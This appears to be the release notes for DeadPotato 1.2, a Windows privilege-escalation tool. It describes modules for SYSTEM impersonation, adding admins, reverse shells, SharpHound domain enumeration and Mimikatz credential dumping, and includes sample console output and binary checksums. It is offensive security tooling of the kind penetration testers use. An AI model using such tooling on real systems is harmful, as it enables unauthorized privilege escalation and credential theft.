DeadPotato - Version 1.2
This version includes the following changes:
- sharphound: Attempts to collect domain data for BloodHound. (NOTE: This will write SharpHound to disk!)
- mimi <sam/lsa/secrets>: Added LSA & Secrets dump with Mimikatz.
- Added banner compatibility for win10.
Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility over the misuse of this DeadPotato or any of it's components.
Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -sharphound module!
C:\Users\lypd0> DeadPotato.exe -sharphound
_.--,_
.-' '-. _ _
/ \ | \ _ _ _||_) _ _|_ _ _|_ _
' _. ' |_/(/_(_|(_|| (_) |_(_| |_(_)
\ """" / ~( Open Source @ github.com/lypd0
'=,,_ =\__ ` & -= Version: 1.2 =-
"" ""'; \\\
_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_
(*) Attempting to write XaOAZsTO.exe (SharpHound) in the current directory...
(+) File written. Attempting to run enumeration...
(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 3640
-={ OUTPUT BELOW }=-
<..SNIP..>
2024-08-04T08:08:05.4023630-07:00|INFORMATION|SharpHound Enumeration Completed at 8:08 AM on 8/4/2024! Happy Graphing!
(+) Removing SharpHound and exiting.
| Binary | MD5 Checksum |
|---|---|
| DeadPotato-NET4.exe | C76954078004EDD81B1836A09F9D0D66 |
| mimikatz.exe (embedded) | E930B05EFE23891D19BC354A4209BE3E |
| [SharpHound.exe] | AAF1146EC9C633C4C3FBE8091F1596D8 |